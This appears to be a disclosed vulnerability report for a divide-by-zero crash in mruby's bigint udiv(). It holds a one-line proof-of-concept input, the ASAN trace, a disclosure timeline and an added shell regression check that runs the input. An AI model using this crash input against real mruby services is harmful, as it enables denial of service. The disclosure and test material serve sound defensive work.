Floating point exception in mruby/mruby


Reported on

Aug 24th 2022


Floating point exception in udiv()

commit : b83285697888abbcb2286462da070d49f413ab24

Proof of Concept

(1 << 63).pow(1, 0)

ASAN Output

==747==ERROR: AddressSanitizer: FPE on unknown address 0x5626e07f6dba (pc 0x5626e07f6dba bp 0x6020000030b8 sp 0x7ffdcd994ab0 T0)
    #0 0x5626e07f6db9 in udiv /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:470
    #1 0x5626e07f8072 in mpz_mod /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:597
    #2 0x5626e07f885b in mpz_powm /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:967
    #3 0x5626e0800323 in mrb_bint_powm /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:1385
    #4 0x5626e0899700 in int_powm /home/bottom/fuzz/mruby/mrbgems/mruby-numeric-ext/src/numeric_ext.c:71
    #5 0x5626e075dd81 in mrb_vm_exec /home/bottom/fuzz/mruby/src/vm.c:1750
    #6 0x5626e0784ad2 in mrb_vm_run /home/bottom/fuzz/mruby/src/vm.c:1226
    #7 0x5626e0849b76 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6912
    #8 0x5626e084f57c in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6955
    #9 0x5626e071a2eb in main /home/bottom/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
    #10 0x7f71a3a0c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #11 0x5626e071c11d in _start (/ctf/mruby_asan+0xc411d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: FPE /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:470 in udiv

Test Platform

Ubuntu 20.04.4 LTS


Denial of Service
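The following script is an added regression check, not part of the report or of the mruby project: it feeds the PoC above to an mruby binary (assumed to be `mruby` on PATH, or the path in `$MRUBY`) and classifies how the interpreter process ended, so a build that dies with SIGFPE (exit status 136) is told apart from one that terminates with an ordinary error such as an uncaught exception.

```shell
#!/bin/sh
# Added example, not from the huntr report or the mruby project.
# Assumes an mruby binary named "mruby" on PATH, or given in $MRUBY.

# classify_status <status>: map a shell exit status to a triage label.
# A status above 128 means the child was killed by signal (status - 128);
# 136 is 128 + 8, i.e. SIGFPE, the trap raised by the division in udiv().
classify_status() {
    status=$1
    if [ "$status" -eq 0 ]; then
        echo clean
    elif [ "$status" -eq 136 ]; then
        echo signal:SIGFPE
    elif [ "$status" -gt 128 ]; then
        echo "signal:$((status - 128))"
    else
        # Non-zero below 128: the interpreter exited on its own (e.g. an
        # uncaught exception), which is the desired outcome for a modulus of 0.
        echo "error-exit:$status"
    fi
}

# run_and_classify <cmd...>: run a command, discard its output, classify its end.
# The "if" keeps "set -e" from aborting the script when the child fails.
run_and_classify() {
    if "$@" >/dev/null 2>&1; then
        rc=0
    else
        rc=$?
    fi
    classify_status "$rc"
}

# check_poc: run the report's PoC expression through mruby.
# Prints the label; returns 1 if the interpreter was killed by a signal.
check_poc() {
    mruby_bin=${MRUBY:-mruby}
    result=$(run_and_classify "$mruby_bin" -e '(1 << 63).pow(1, 0)')
    echo "$result"
    case "$result" in
        signal:*) return 1 ;;
        *) return 0 ;;
    esac
}
```

Run `check_poc` against the commit named in the report and against the fixed build; the first should print `signal:SIGFPE`, the second an `error-exit:` label.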

Timeline

We are processing your report and will contact the mruby team within 24 hours. (a month ago)
bottom modified the report (a month ago)
We have contacted a member of the mruby team and are waiting to hear back (a month ago)
Yukihiro "Matz" Matsumoto validated this vulnerability (a month ago)
bottom has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on ef1974 (a month ago)
Yukihiro "Matz" Matsumoto has been awarded the fix bounty (a month ago)


Is there a CVE ID for it?
